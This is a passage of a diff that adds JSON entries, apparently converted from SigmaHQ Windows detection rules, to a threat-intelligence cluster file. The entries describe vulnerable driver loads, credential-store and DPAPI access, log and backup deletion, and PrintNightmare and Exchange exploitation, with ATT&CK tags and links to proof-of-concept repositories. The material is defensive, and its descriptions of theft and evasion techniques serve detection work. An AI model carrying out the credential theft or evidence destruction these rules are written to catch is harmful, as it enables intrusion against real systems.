"driver_load_vuln_hw_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "value": "Vulnerable Lenovo Driver Load", + "meta": { + "refs": [ + "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", + "https://github.com/alfarom256/CVE-2022-3699/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_lenovo_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ], + "creation_date": "2022/11/10", + 
"filename": "driver_load_vuln_lenovo_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate driver loads (old driver that didn't receive an update)" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "uuid": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "value": "Vulnerable WinRing0 Driver Load", + "meta": { + "refs": [ + "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_winring0_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/26", + "filename": "driver_load_vuln_winring0_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "uuid": "679085d5-f427-4484-9f58-1dc30a7c426d", + "value": "WinDivert Driver Load", + "meta": { + "refs": [ + "https://reqrypt.org/windivert-doc.html", + "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_windivert.yml" + ], + "tags": [ + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" + ], + "creation_date": "2021/07/30", + "filename": "driver_load_windivert.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate WinDivert driver usage" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + 
{ + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "value": "Browser Credential Store Access", + "meta": { + "refs": [ + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://github.com/lclevy/firepwd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" + ], + "tags": [ + "attack.t1003", + "attack.credential_access" + ], + "creation_date": "2022/04/09", + "filename": "file_access_win_browser_credential_stealing.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Software installed on other partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" + ], + "logsource.category": "file_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "value": "Credential Manager Access", + "meta": { + "refs": [ + "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" + ], + "tags": [ + "attack.t1003", + "attack.credential_access" + ], + "creation_date": "2022/10/11", + "filename": "file_access_win_credential_manager_stealing.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + ], + "logsource.category": "file_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", + "value": "Suspicious Access To Windows DPAPI Master Keys", + "meta": { + "refs": [ + "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ], + "creation_date": "2022/10/17", + "filename": "file_access_win_dpapi_master_key_access.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "value": "Suspicious Access To Windows Credential History File", + "meta": { + "refs": [ + "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", + "https://www.passcape.com/windows_password_recovery_dpapi_credhist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ], + "creation_date": "2022/10/17", + "filename": "file_access_win_susp_cred_hist_access.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_access", + "logsource.product": "windows" + } + }, + { + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "value": "File Creation Date Changed to Another Year", + "meta": { + "refs": [ + "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" + ], + "tags": [ + "attack.t1070.006", + "attack.defense_evasion" + ], + "creation_date": "2022/08/12", + "filename": "file_change_win_2022_timestomping.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Changes made to or by the local NTP service" + ], + "logsource.category": "file_change", + "logsource.product": "windows" + } + }, + { + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 
(SigRed)", + "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "value": "Unusual File Modification by dns.exe", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ], + "creation_date": "2022/09/27", + "filename": "file_change_win_unusual_modification_by_dns_exe.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_change", + "logsource.product": "windows" + } + }, + { + "description": "Detect DLL deletions from Spooler Service driver folder", + "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "value": "Windows Spooler Service Suspicious File Deletion", + "meta": { + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" + ], + "creation_date": "2021/07/01", + "filename": "file_delete_win_cve_2021_1675_printspooler_del.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Deletion of log files is a known anti-forensic technique", + "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", + "value": "Delete Log from Application", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_appli_log.yml" + ], + 
"tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2022/01/16", + "filename": "file_delete_win_delete_appli_log.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "value": "Deletes Backup Files", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/01/02", + "filename": "file_delete_win_delete_backup_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitime usage" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deletion of a prefetch file (AntiForensic)", + "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "value": "Prefetch File Deletion", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2021/09/29", + "filename": "file_delete_win_delete_prefetch.yml", + "author": "Cedric MAURUGEON", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + 
"uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "value": "Exchange PowerShell Cmdlet History Deleted", + "meta": { + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2022/10/26", + "filename": "file_delete_win_exchange_powershell_logs.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Possible FP during log rotation" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.", + "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", + "value": "Sysinternals SDelete File Deletion", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2020/05/02", + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Legitime usage of SDelete" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "value": "Unusual File Deletion by 
dns.exe", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ], + "creation_date": "2022/09/27", + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deletion of WebServer access logs which may indicate an attempt to destroy forensic evidence", + "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", + "value": "WebServer Access Logs Deleted", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_webserver_access_logs_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2022/09/16", + "filename": "file_delete_win_webserver_access_logs_deleted.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "During uninstallation of the IIS service", + "During log rotation" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", + "value": "Suspicious File Event With Teams Objects", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ], + "creation_date": "2022/09/16", + "filename": "file_event_win_access_susp_teams.yml", + "author": "@SerkinValery", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", + "uuid": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "value": "Suspicious Unattend.xml File Access", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2021/12/19", + "filename": "file_event_win_access_susp_unattend_xml.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", + "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "value": "Advanced IP Scanner - File Event", + "meta": { + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2020/05/12", + "filename": "file_event_win_advanced_ip_scanner.yml", + "author": "@ROxPinTeddy", + "level": "medium", + "falsepositive": [ + "Legitimate administrative use" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", + "value": "Anydesk Temporary Artefact", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/11", + "filename": "file_event_win_anydesk_artefact.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects anydesk writing binaries files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it's highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", + "value": "Suspicious Binary Writes Via AnyDesk", + "meta": { + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/09/28", + "filename": "file_event_win_anydesk_writing_susp_binaries.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. 
The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "uuid": "3a3f81ca-652c-482b-adeb-b1c804727f74", + "value": "Unidentified Attacker November 2018 - File", + "meta": { + "refs": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_apt_unidentified_nov_18.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218.011" + ], + "creation_date": "2018/11/20", + "filename": "file_event_win_apt_unidentified_nov_18.yml", + "author": "@41thexplorer, Microsoft Defender ATP", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "value": "BloodHound Collection Files", + "meta": { + "refs": [ + "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/08/09", + "filename": "file_event_win_bloodhound_collection.yml", + "author": "C.J. 
May", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", + "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "value": "CrackMapExec File Creation Patterns", + "meta": { + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/03/12", + "filename": "file_event_win_crackmapexec_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of system dlls that are not present on the system. 
Usualy to achieve dll hijacking", + "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "value": "Creation Of Non-Existent DLLs In System Folders", + "meta": { + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/12/01", + "filename": "file_event_win_create_non_existent_dlls.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "value": "New Shim Database Created in the Default Directory", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ], + "creation_date": "2021/12/29", + "filename": "file_event_win_creation_new_shim_database.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + 
"logsource.product": "windows" + } + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", + "value": "Suspicious Screensaver Binary File Creation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.002" + ], + "creation_date": "2021/12/29", + "filename": "file_event_win_creation_scr_binary_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "value": "Files With System Process Name In Unsuspected Locations", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2020/05/26", + "filename": "file_event_win_creation_system_file.yml", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + 
"description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "value": "Creation Exe for Service with Unquoted Path", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ], + "creation_date": "2021/12/30", + "filename": "file_event_win_creation_unquoted_service_path.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "value": "Cred Dump Tools Dropped Files", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" + ], + "creation_date": "2019/11/01", + "filename": "file_event_win_cred_dump_tools_dropped_files.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "logsource.category": "file_event", + "logsource.product": 
"windows" + } + }, + { + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "value": "WScript or CScript Dropper - File", + "meta": { + "refs": [ + "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/10", + "filename": "file_event_win_cscript_wscript_dropper.yml", + "author": "Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", + "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", + "value": "Dynamic C Sharp Compile Artefact", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ], + "creation_date": "2022/01/09", + "filename": "file_event_win_csharp_compile_artefact.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "meta": { + 
"refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" + ], + "creation_date": "2021/06/29", + "filename": "file_event_win_cve_2021_1675_printspooler.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server\u2019s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "uuid": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "value": "CVE-2021-26858 Exchange Exploitation", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_26858_msexchange.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution", + "cve.2021.26858" + ], + "creation_date": "2021/03/03", + "filename": "file_event_win_cve_2021_26858_msexchange.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "meta": { + "refs": [ + 
